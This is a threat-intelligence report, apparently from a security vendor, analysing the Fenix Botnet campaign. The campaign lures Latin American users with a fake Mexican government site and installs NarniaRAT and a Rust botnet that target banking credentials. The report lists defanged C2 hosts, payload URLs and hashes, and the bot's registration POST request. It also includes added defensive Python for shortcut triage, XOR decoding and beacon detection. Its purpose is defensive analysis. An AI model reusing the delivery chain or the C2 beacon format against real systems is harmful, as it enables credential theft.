Fenix Botnet Targeting LATAM Users

Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.

We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.

Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.

In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.

Here’s the latest from our TRU Team…

What did we find?

In January 2024, the Threat Response Unit (TRU) identified a campaign targeting Latin American users. Victims are deceived into downloading a malicious zip archive under the guise of a legitimate tool from a website masquerading as the Government of Mexico.

Upon successful execution, the payload installs a Remote Access Trojan (RAT) with infostealing capabilities and enlists the compromised machine into a botnet.

This campaign is particularly noteworthy for its stealer/banker functionality, which targets a specific list of Latin American financial institutions. The RAT deployed by the threat actors behind Fenix Botnet exhibits capabilities designed to intercept and steal banking credentials, directly impacting the financial security of individuals and corporations alike.

The initial infection started when the user visited the malicious page (Figure 1).

Figure 1: Malicious website

After entering the prompted data (Figure 2), the user gets redirected to the pages shown in Figures 3-4.

Figure 2: Prompt to enter the data. Text translated to English.
Figure 3: Redirect page 1. Text translated to English.
Figure 4: Redirect page 2

After clicking the button indicated in Figure 4, the user is served a ZIP archive named “AvisodePrivacidadVirtual.zip” (MD5: 95260c9385dbb1f52004e7ab5aceda96); the hash does not change between downloads.

The contents of the ZIP archive are shown in Figure 5. The archive contains a text file with instructions for launching the Internet Shortcut (.url) file. Internet Shortcuts can be crafted to retrieve malicious files from a remote network share over the Internet.

Figure 5 shows that the .url shortcut file contains an embedded URL (172.86.75[.]130vWarfc.jse). The shortcut eventually retrieves the “rfc.jse” file (MD5: a7fadf0050d4d0b2cefd808e16dfde69).

Figure 5: Contents of the ZIP archive, translation added.
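As an added example (not part of the original post and not eSentire's tooling), the following Python script parses the URL= target of a Windows Internet Shortcut and flags targets that point at a remote share or at a script file, which is the delivery pattern described above. The sample .url contents, the host 192.0.2.10 and the share path are constructed placeholders; the campaign's actual embedded URL is the one quoted from Figure 5.

```python
"""Triage Windows Internet Shortcut (.url) files for remote-share delivery.

Added example; not code from eSentire or from the campaign. The shortcut
text below is constructed: 192.0.2.10 and /share/ are placeholders, not the
IP and path seen in the campaign.
"""
import configparser
from urllib.parse import urlparse

# Extensions a benign web shortcut has no reason to point at.
SCRIPT_EXTENSIONS = (".jse", ".js", ".vbs", ".vbe", ".wsf", ".hta",
                     ".lnk", ".exe", ".dll", ".scr")

SAMPLE_URL_FILE = """[InternetShortcut]
URL=file://192.0.2.10/share/rfc.jse
IconIndex=13
IconFile=C:\\Windows\\System32\\shell32.dll
"""


def parse_url_shortcut(text):
    """Return the URL= value from the [InternetShortcut] section, or None."""
    parser = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    parser.optionxform = str          # keep 'URL' in its original case
    parser.read_string(text)
    if not parser.has_section("InternetShortcut"):
        return None
    return parser.get("InternetShortcut", "URL", fallback=None)


def assess_target(url):
    """Return reasons the target looks like a payload-delivery vector.

    An empty list means nothing suspicious was found.
    """
    reasons = []
    if not url:
        return reasons
    if url.startswith("\\\\"):
        # \\host\share\file: Windows resolves this over SMB or WebDAV.
        reasons.append("UNC path: retrieves the target from a remote share")
        path = url.replace("\\", "/")
    else:
        parsed = urlparse(url)
        path = parsed.path
        if parsed.scheme == "file" and parsed.netloc:
            reasons.append("file:// with a remote host: retrieves the target "
                           "from a remote share")
        elif parsed.scheme not in ("http", "https"):
            reasons.append(f"unexpected scheme {parsed.scheme!r}")
    if path.lower().endswith(SCRIPT_EXTENSIONS):
        reasons.append("target is a script or executable: "
                       + path.rsplit("/", 1)[-1])
    return reasons


def triage(text):
    """Parse a .url file and return (target, reasons)."""
    target = parse_url_shortcut(text)
    return target, assess_target(target)


if __name__ == "__main__":
    target, reasons = triage(SAMPLE_URL_FILE)
    print("target:", target)
    for reason in reasons:
        print(" -", reason)
```

Run over a mail gateway or endpoint quarantine of extracted archive contents, a shortcut whose target is both remote and script-typed, as in this campaign, scores two findings; a normal web bookmark scores none.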

The deobfuscated JSE is shown in Figure 6. It retrieves another payload named “7i1.xls”; the contents of that payload are shown in Figure 7. The payload retrieves the .NET loader named “7i1.xls” (MD5: 7f739c189c96d42bff65e8b7b7c42237), which injects shellcode into AuthHost.exe via QueueUserAPC process injection, as shown in Figure 7.

In our testing, the shellcode retrieved one of two payloads, as shown in Figure 8: either a “narnia.xls” file (app.quantumservice[.]lat/2XpbhUdaA4/narnia.xls, MD5: 43f6c3f92a025d12de4c4f14afa5d098), which we dubbed NarniaRAT based on the filename, or the BotnetFenix payload (MD5: cfb7d71a73585052041f8c9a057c83c6) from app.quantumservice[.]lat/2XpbhUdaA4/vc67j2.xls.

Figure 6: Deobfuscated JSE file
Figure 7: Process injection via QueueUserAPC
Figure 8: Shellcode downloading the payload

NarniaRAT provides exfiltration, screen capture, keylogging, and banking credential theft functionality.

The RAT exfiltrates files from the Desktop, Documents, Windows, and %USERPROFILE% folders. The data exfiltration functionality is shown below.

Figure 9: Data exfiltration

The function in Figure 10 retrieves computer information, including private and public IP addresses, country, antivirus products, system uptime, etc.

Figure 10: Gather computer information

NarniaRAT monitors the infected machine for browser processes such as Chrome, Firefox, Edge, Internet Explorer, Opera, Brave and Safari (Figure 11).

Figure 11: Browser process monitoring

It’s worth mentioning that NarniaRAT uses the “Get WatchList” command to fetch a list of banking names from the C2 server (45.77.71[.]28). The specificity of this operation is noteworthy: the fetched list consists predominantly of banking entities operating in Latin American countries.

The list of fetched banking information:

Banamex|BancaNet Empresarial | Citibanamex.com|BancaNet | Citibanamex.com|HSBC Personas - Productos Y Servicios - HSBC México|HSBCnet | HSBC México|Iniciar Sesión | HSBCnet|Empresas y Gobierno | Empresas | BBVA México|Bienvenidos a la Banca en Línea | BBVA Mexico|Banorte | El Banco Fuerte de México|Empresas y Corporativos|Somos el banco de creadores | Banregio|Banca electrónica empresarial | Empresas | Banregio|BBVA Net Cash|Santander México | Se parte de la banca electrónica| Banca de Empresas | Productos financieros empresariales Santander|SuperNet Santander | la banca electrónica por internet|BanBajío | Tu Banco de Confianza |Bajionet para Empresas, La Banca Electrónica de BanBajío|Bajionet|Banca | Servicios Financieros | Grupo Financiero Mifel|Banca MIFEL|Scotiabank México | Tú decides, Nosotros te Asesoramos|Inicia sesión en ScotiaWeb - ScotiaWeb|ScotiaWeb Empresas | Scotia|Ve por más- Banco|Bansí - Un Banco Entre Personas|El banco que quiero | BanCoppel.com|Banca Empresarial BanCoppel | BanCoppel.com|Banco Azteca, tu banca en línea| Sueñas, Decides, Logras|Banca en línea Empresarial | Banco Azteca|Grupo Financiero Inbursa|Inbursa | Banca en Línea| nea Empresarial

BotnetFenix is written in Rust. The botnet has the ability to download and execute remote tasks, including reflective code loading, running PowerShell commands, and downloading a stealer (steal.crypt), as shown in Figure 12.

At the time of writing, steal.crypt (MD5: 594804aa21887ee9d7b1b888f482d60c) appears to contain only a reflective DLL loader component.

Figure 12: Downloading the

BotnetFenix can also decrypt payloads retrieved from its C2 servers using a simple XOR algorithm with a hardcoded key. The C2 server addresses are hardcoded into the botnet payloads.
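For an analyst decoding a payload captured from the C2, a repeating-key XOR like the one described above is both trivial to reverse and, because the first bytes of a Windows executable are predictable, trivial to recover the key for. The Python below is an added analyst helper, not BotnetFenix's code and not from the original post; KEY and the sample payload are constructed placeholders, and the real key would have to be pulled from the bot binary.

```python
"""Decode a C2 payload that was XOR-encrypted with a repeating hardcoded key.

Added analyst helper; not BotnetFenix's code and not from the original post.
KEY and SAMPLE_PLAINTEXT are constructed placeholders: the real key would be
recovered from the bot binary, and the real payload is whatever the C2 served.
"""
from itertools import cycle

KEY = b"placeholderkey"                     # placeholder, not the campaign's key

# Typical DOS header of a PE file: this much is identical across most
# Windows executables and makes a good known-plaintext anchor.
PE_DOS_HEADER = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00"
                 b"\xff\xff\x00\x00\xb8\x00\x00\x00")

# Constructed stand-in for a served payload: a DOS header plus filler bytes.
SAMPLE_PLAINTEXT = PE_DOS_HEADER + bytes(range(64))


def xor_with_key(data, key):
    """XOR data against a repeating key. XOR is its own inverse, so the same
    call both encrypts and decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def looks_like_pe(data):
    """Cheap sanity check on a decoded blob: Windows executables start with 'MZ'."""
    return data[:2] == b"MZ"


def recover_key(ciphertext, known_plaintext, key_len):
    """Recover a repeating XOR key from known plaintext at offset 0.

    Needs at least key_len known bytes; a PE DOS header supplies 20 here.
    """
    if len(known_plaintext) < key_len:
        raise ValueError("not enough known plaintext for this key length")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len],
                                       known_plaintext[:key_len]))


def decode_payload(ciphertext, key):
    """Decode and report whether the result looks like an executable."""
    plaintext = xor_with_key(ciphertext, key)
    return plaintext, looks_like_pe(plaintext)


if __name__ == "__main__":
    blob = xor_with_key(SAMPLE_PLAINTEXT, KEY)       # what the C2 would serve
    decoded, is_pe = decode_payload(blob, KEY)
    print("decoded looks like PE:", is_pe)
    print("key recovered from DOS header:",
          recover_key(blob, PE_DOS_HEADER, len(KEY)) == KEY)
```

The known-plaintext recovery only needs the key length, which can be brute-forced over a small range by checking which candidate length yields an 'MZ' header and a sensible DOS stub; this is why a static XOR key offers the operators no real confidentiality once a single sample is in hand.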

Below is an example of the POST request to register the newly infected machine.

POST /2XpbhUdaA4/post.php HTTP/1.1
Accept: text/html, text/strings
content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Host: app.quantumservice[.]lat
Content-Length: 59
Cache-Control: no-cache
action=add_register&uuid={uuid_value}&os={os_value}&is_admin={1 or 0 for True or False}&av={antivirus}&system_type={system_type_value}&desktopname={desktop_name}
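The registration beacon above is the kind of traffic a proxy log or IDS can match on. The following Python, added here as an example rather than eSentire's detection content, parses a captured HTTP POST, decodes the form body, and reports whether it has the shape of the add_register beacon (a POST to a path ending in post.php, action=add_register, and the field set shown above). Both sample requests are constructed: the beacon copies the header and field layout quoted in the post with invented values and the Host header left defanged, and the second request is an ordinary login form that must not match.

```python
"""Match a captured HTTP POST against the BotnetFenix registration beacon shape.

Added example; not eSentire's detection rules and not the botnet's code.
Both sample requests below are constructed: the beacon copies the header and
field layout quoted in the post, with invented values; the second request is
an ordinary login form that must not match.
"""
from urllib.parse import parse_qs

# Fields the add_register beacon carries, per the request shown in the post.
REGISTRATION_FIELDS = {"action", "uuid", "os", "is_admin", "av",
                       "system_type", "desktopname"}


def build_request(path, host, body, accept="text/html, text/strings"):
    """Assemble a raw HTTP/1.1 POST string (helper for the constructed samples)."""
    headers = [
        f"POST {path} HTTP/1.1",
        f"Accept: {accept}",
        "content-type: application/x-www-form-urlencoded",
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        f"Host: {host}",
        f"Content-Length: {len(body)}",
        "Cache-Control: no-cache",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


SAMPLE_BEACON = build_request(
    "/2XpbhUdaA4/post.php", "app.quantumservice[.]lat",
    "action=add_register&uuid=00000000-1111-2222-3333-444444444444"
    "&os=Windows+10&is_admin=1&av=Windows+Defender"
    "&system_type=x64&desktopname=DESKTOP-EXAMPLE")

SAMPLE_BENIGN = build_request(
    "/account/login", "www.example.com",
    "username=alice&password=hunter2&remember=1", accept="text/html")


def parse_http_request(raw):
    """Split a raw request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def match_registration_beacon(raw):
    """Return (matched, fields) for a raw HTTP request.

    matched is True only when the request is a form POST to .../post.php whose
    body carries action=add_register and every expected field.
    """
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or not path.endswith("/post.php"):
        return False, {}
    if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return False, {}
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if fields.get("action") != "add_register":
        return False, fields
    return REGISTRATION_FIELDS.issubset(fields), fields


if __name__ == "__main__":
    for label, raw in (("beacon", SAMPLE_BEACON), ("benign", SAMPLE_BENIGN)):
        matched, fields = match_registration_beacon(raw)
        print(f"{label}: matched={matched} fields={sorted(fields)}")
```

The match deliberately keys on body structure rather than on the Host header or the /2XpbhUdaA4/ path prefix, since the operators can rotate domains and directory names far more cheaply than the bot's registration format; the unusual "Accept: text/html, text/strings" header is a further weak indicator worth logging alongside it.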

What did we do?

Our team of 24/7 SOC Cyber Analysts isolated the system and performed additional investigation before alerting the customer.

What can you learn from this TRU Positive?

  • The importance of recognizing the initial vectors of infection, such as visiting malicious websites. This case underscores the need for continuous awareness and education on the dangers of navigating to untrusted sites.
  • The use of process injection to execute malicious payloads covertly within legitimate processes. This technique underscores the need for behavioral detection mechanisms to identify and mitigate such evasion techniques.
  • The example demonstrates how malware communicates with a C2 server to download additional payloads, such as NarniaRAT and BotnetFenix. It emphasizes the importance of monitoring network traffic for unusual patterns that could indicate C2 communication.
  • The ability of BotnetFenix to download and execute tasks, including reflective code loading, together with NarniaRAT’s functionalities, such as data exfiltration, screen capture, keylogging, and banking information theft, illustrates the diverse capabilities of the BotnetFenix threat actors and the severe implications for privacy and data security.

Recommendations from our Threat Response Unit (TRU):

Detection Rules

You can access the detection rules here and here.

Indicators of Compromise

You can access the indicators of compromise here.
